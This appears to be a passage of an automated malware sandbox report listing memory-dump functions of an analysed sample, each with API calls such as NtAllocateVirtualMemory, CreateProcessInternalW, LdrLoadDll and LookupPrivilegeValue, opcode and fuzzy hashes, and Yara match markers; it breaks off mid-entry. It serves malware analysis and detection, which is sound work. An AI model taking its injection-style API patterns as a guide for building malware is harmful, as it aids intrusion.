                    • Instruction ID: 7f7cbcf3b0387ba80358b11566dcb6dbce13a3342eb789e160eeeb9b95a27428
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: B1D01275240214BBD710EB98CC45E97775CEF44750F154455BA185B242C530F50086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A53C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00732D11,00002000,00003000,00000004), ref: 0074A579
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: ec05d6b7fa3ee7d69b6f4fd2ca4d028c3fbdf4fe9bad70b243364da362aa394e
                    • Instruction ID: 6440762ce8e4c3f3625f59b65d49ee84dc3c1bf90e26c3ae35932908bf3034fd
                    • Opcode Fuzzy Hash: ec05d6b7fa3ee7d69b6f4fd2ca4d028c3fbdf4fe9bad70b243364da362aa394e
                    • Instruction Fuzzy Hash: D1F01CB2210208ABDB14DF88DC91EEB77ADEF88754F158548FE589B241C630E911CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00732D11,00002000,00003000,00000004), ref: 0074A579
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: f3fa0d1b99a2cc8863d9706280ce1ffcc30c198a07ddffd235c50bef31d639bb
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 2AF015B2200208ABDB14DF89CC81EAB77ADEF88754F118148BE0897241C630F811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 950f83a70a865de795caef48d4771ce032487bde107a44f71477f0e6195059cc
                    • Instruction ID: a12b26951181e9caac5da87a04371ed2c5fd23672e6b1bb3b5f799eee003ad6c
                    • Opcode Fuzzy Hash: 950f83a70a865de795caef48d4771ce032487bde107a44f71477f0e6195059cc
                    • Instruction Fuzzy Hash: DF90026122184442E600A5794D14B07000597D0343F51C116A0144554CCA558CA17571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7fe25e15e488bfacefe536c85ee3c6dac1be93a6a42e62b924d2e17adcfa48c7
                    • Instruction ID: 7a208a2a55a8d491cb51e181822955e354732ac9f9291be3396001c9fb1b4c35
                    • Opcode Fuzzy Hash: 7fe25e15e488bfacefe536c85ee3c6dac1be93a6a42e62b924d2e17adcfa48c7
                    • Instruction Fuzzy Hash: 809002B121104802E540B1694504746000597D0341F51C012A5054554E87998DD576B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3644fded2a711db54d979e66f4547d5937b2a9360517a6dd4c4aabb1d4f2d70c
                    • Instruction ID: f04aaee94a9659af2e96edfe257a6f0a26643053db584bb1db07a8f615c27904
                    • Opcode Fuzzy Hash: 3644fded2a711db54d979e66f4547d5937b2a9360517a6dd4c4aabb1d4f2d70c
                    • Instruction Fuzzy Hash: 1B9002A135104842E500A1694514B060005D7E1341F51C016E1054554D8759CC927176
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 20502796c1f7a6dfa973799fc96b05c7be09677b07628d8dbcd1e65f21b40636
                    • Instruction ID: a401ea55cdf58beb23dfa2637b9cb3cb19fa0ef0752f0fd2a8f58f9bc0e0b459
                    • Opcode Fuzzy Hash: 20502796c1f7a6dfa973799fc96b05c7be09677b07628d8dbcd1e65f21b40636
                    • Instruction Fuzzy Hash: 5A90027121104813E511A1694604707000997D0281F91C413A0414558D97968D92B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 07cf9a4d04ead403a79de045caadb9490ded194aa0b95b7ff9c86bffe33849a8
                    • Instruction ID: 1a9c21db9a1eee9ee142ef6ff1cf8915904da2e791fa77f4a85ae83e4850cd8f
                    • Opcode Fuzzy Hash: 07cf9a4d04ead403a79de045caadb9490ded194aa0b95b7ff9c86bffe33849a8
                    • Instruction Fuzzy Hash: F7900261252085526945F16945045074006A7E0281791C013A1404950C86669C96F671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 44b3889a3680de8ce1ad4c57b6e89e6627c0e6564a811417718812869cecdfdc
                    • Instruction ID: 02628c35de277c8952c00cc6eda346e3deb138d32fe115e867ea183c33ab6be4
                    • Opcode Fuzzy Hash: 44b3889a3680de8ce1ad4c57b6e89e6627c0e6564a811417718812869cecdfdc
                    • Instruction Fuzzy Hash: 1D90027121104802E500A5A95508646000597E0341F51D012A5014555EC7A58CD17171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5cebee1022cc63ce377dc41cb7ef3c6450f7bf959064dac6232b64bc418cc6d4
                    • Instruction ID: fba85e9602a9025abed4cda840eb97832306ad503dcde29556c7f48c5e145f67
                    • Opcode Fuzzy Hash: 5cebee1022cc63ce377dc41cb7ef3c6450f7bf959064dac6232b64bc418cc6d4
                    • Instruction Fuzzy Hash: BA90026922304402E580B169550860A000597D1242F91D416A0005558CCA558CA97371
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d9bccdfdc438747015dfeba72c8bdeb8d05520e8cc9f974f7f1167e2a75dbf5d
                    • Instruction ID: 36afc102d5d3c18cdab624e66d99030078839bb9f8e2bc0f7a6913cd4d837beb
                    • Opcode Fuzzy Hash: d9bccdfdc438747015dfeba72c8bdeb8d05520e8cc9f974f7f1167e2a75dbf5d
                    • Instruction Fuzzy Hash: F090027132118802E510A1698504706000597D1241F51C412A0814558D87D58CD17172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7408303693d9e8df9fbb2d716c4c6b226b3aced2ae6f7fb2e3c5369b3b70509f
                    • Instruction ID: 3a7d067741bb3310eee33f7dfba0b94e5a8a7891bd3708bcc2ee5882caf7e9a4
                    • Opcode Fuzzy Hash: 7408303693d9e8df9fbb2d716c4c6b226b3aced2ae6f7fb2e3c5369b3b70509f
                    • Instruction Fuzzy Hash: 1390027121104C02E580B169450464A000597D1341F91C016A0015654DCB558E9977F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: cbf48bf0067e386c423bc2c27d24c1ffb4bd7b69c8cccfdcbcac78908f72e942
                    • Instruction ID: 4c9bad1fd32e0593855732374da5ef55c84dc7c7fdd68eb2925bea026468c47e
                    • Opcode Fuzzy Hash: cbf48bf0067e386c423bc2c27d24c1ffb4bd7b69c8cccfdcbcac78908f72e942
                    • Instruction Fuzzy Hash: 5290027121508C42E540B1694504A46001597D0345F51C012A0054694D97658D95B6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6c0d255301f58590a071d1c993ac2903a998e340975a1de966ac02afe351b097
                    • Instruction ID: d24d11a5aa7275fda3eaefd7ddad51479f2e331ca3f31d7d9e769520059050e3
                    • Opcode Fuzzy Hash: 6c0d255301f58590a071d1c993ac2903a998e340975a1de966ac02afe351b097
                    • Instruction Fuzzy Hash: F49002712110CC02E510A169850474A000597D0341F55C412A4414658D87D58CD17171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4b470b29091b99c926b3c183049f854a45646662fbc8809979af6ccab1333554
                    • Instruction ID: 494f14cca1b34d71006e59b1866e648af62c70e4dd1adb450de7193ac2948dba
                    • Opcode Fuzzy Hash: 4b470b29091b99c926b3c183049f854a45646662fbc8809979af6ccab1333554
                    • Instruction Fuzzy Hash: 0490027121104C42E500A1694504B46000597E0341F51C017A0114654D8755CC917571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03289540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6af6060f40139cabf652678956cfff1ae61962a37b44163fca83a4ee4803796d
                    • Instruction ID: 77e0fb316b20283566d109c7536dc57bda579eed387e3fc912d856519fca051d
                    • Opcode Fuzzy Hash: 6af6060f40139cabf652678956cfff1ae61962a37b44163fca83a4ee4803796d
                    • Instruction Fuzzy Hash: 6B900475331044031505F57D07045070047D7D53D1351C033F1005550CD771CCF17171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 304205868cb580847d5fd4ac1fba9a3d373f3a930d6ad82f2557cb96665648ff
                    • Instruction ID: a37005fd51c0de7aad619741d4d8a52311f39a071e8c14f9c8d1cac18034a106
                    • Opcode Fuzzy Hash: 304205868cb580847d5fd4ac1fba9a3d373f3a930d6ad82f2557cb96665648ff
                    • Instruction Fuzzy Hash: 0C9002A1212044035505B1694514616400A97E0241B51C022E1004590DC6658CD17175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00749080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00749128
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction ID: 2e9a93e732ec66035b1b5c1741333baca3a6ec72ee209c4048f281914a844cce
                    • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction Fuzzy Hash: 883192B2500745BBC714DF64C889FA7B7B8FB48B00F10851DF62A5B245D734B950CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00749076, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00749128
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: f4006af846211cba52e0a7ca17cd4c9a09f7e967d71016ca24dd1f3d1dfc451d
                    • Instruction ID: c12e1a792197d6a43f3fd578e13beb95f55f79aea4b34dcae56e1efaa2f4e2e8
                    • Opcode Fuzzy Hash: f4006af846211cba52e0a7ca17cd4c9a09f7e967d71016ca24dd1f3d1dfc451d
                    • Instruction Fuzzy Hash: 0621A2B1940345FBC714DF64CC89FA7B7B8AB88B00F10845DF6295B246D778A950CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A662, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00733AF8), ref: 0074A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: b445280c34972953eef8159201e15f7f36d2cdf7412113ce5c5254b9fe3e8b3c
                    • Instruction ID: 2d0328ea1230d6311a2620d3bcb2493f8a86ccf5612662eacb26ec77d4a6ced6
                    • Opcode Fuzzy Hash: b445280c34972953eef8159201e15f7f36d2cdf7412113ce5c5254b9fe3e8b3c
                    • Instruction Fuzzy Hash: 7EF039B6204245AFDB25DF64CC89EA7BBA8EF84354F144588FD595B241C235F814CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00733AF8), ref: 0074A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: 37c079b2f7aa63053c208f76d76cf00be06043696f26c544acd940f9898eb7fa
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: B4E046B1200208BBDB18EF99CC49EA777ACEF88750F118558FE085B242C630F914CAF0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(6Et,?,00744CAF,00744CAF,?,00744536,?,?,?,?,?,00000000,00000000,?), ref: 0074A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6Et
                    • API String ID: 1279760036-96554581
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: ed868f0adc9e45d0941fcfd700749d2179cbe3ed5f2f56e85d9928ee4b19218b
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: FCE012B1200208ABDB14EF99CC45EA777ACEF88654F118558BE085B242C630F9158AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00738310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0073836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0073838B
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 400cd083849fa425bc8edfef55c6e31d67ee0e6062101fb3706f6d03b0147a9d
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: 16018431A81328B6F721AA949C47FBE776C5B40F50F054114FF04BA1C2EAA8690546F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0073ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0073AD62
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 16428aa2f17574f780d56eaacff2252583d866b8b61e1bf4e91656a4b35ef784
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: A7011EB5E0020DBBDF10DAE4DC46FEDB3789B54308F004595EA0897646F675EB148B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A6DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0074A734
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: fc6953d97ff36295c7e086f71de5bacc25086dd88da18cc2a475c80f97768068
                    • Instruction ID: 2d7ca4d6877a403f6340cd463619db092a3af1bfdd998132b8e6a9bee4b75af1
                    • Opcode Fuzzy Hash: fc6953d97ff36295c7e086f71de5bacc25086dd88da18cc2a475c80f97768068
                    • Instruction Fuzzy Hash: 6601B2B6210108BFCB58DF89DC80EEB37ADAF8C754F158258FA0D97241D630E851CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0074A734
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: 2708e786ce593e29cc247d498e95647d001d79f70a8fb856a2a08f3aadc0d08b
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: AD01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 007491B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0073F050,?,?,00000000), ref: 007491EC
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 99fcb9b7b30df4d86e90b5a4a83c6d9f27f324d9dc8e82fa5e5eb4eedb0108d3
                    • Instruction ID: 4d5351a3c1a136ed8db88bd6d1f44ed6194f587b97c6446a16ba601fed3eb784
                    • Opcode Fuzzy Hash: 99fcb9b7b30df4d86e90b5a4a83c6d9f27f324d9dc8e82fa5e5eb4eedb0108d3
                    • Instruction Fuzzy Hash: EFE092373803143AE7306599AC03FA7B39CDB81B20F150026FB0DEB2C1DA99F80142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A7C1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0073F1D2,0073F1D2,?,00000000,?,?), ref: 0074A800
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 0034b921cad3509e1da8d1c3c716ebd43afd0bc3422e406f5bbdda511977349e
                    • Instruction ID: e8b1d0b983af557d4cee847c2b8208da28228e2678d725d198ef84c9f6e3ae1c
                    • Opcode Fuzzy Hash: 0034b921cad3509e1da8d1c3c716ebd43afd0bc3422e406f5bbdda511977349e
                    • Instruction Fuzzy Hash: FFF0A0B52412046BD714DF54DC45FE73B68AF89650F148054FE5817342D634E915CBF1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0074A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0073F1D2,0073F1D2,?,00000000,?,?), ref: 0074A800
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 2b76034b8ed27a3dad0bfb013d42776221ac615600e4bc72d4cee1396f4a9d03
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: FEE01AB1200208ABDB10DF49CC85EE737ADEF88650F118154BE0857241CA34E8158BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0073F6C8, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00738D14,?), ref: 0073F6FB
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: af3271f7095da5b9fb2ec9f8a82c81fc53fa62a90eaa16ba70667aa399b5de3e
                    • Instruction ID: 4b138b55ac391b4346cf763c191823a5d023793878efa434d8de49850eaac132
                    • Opcode Fuzzy Hash: af3271f7095da5b9fb2ec9f8a82c81fc53fa62a90eaa16ba70667aa399b5de3e
                    • Instruction Fuzzy Hash: F6E0C232B403047BEB14EFB09C03F663394AF58B40F1A0078F54DD72D3EA65D1018610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0073F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
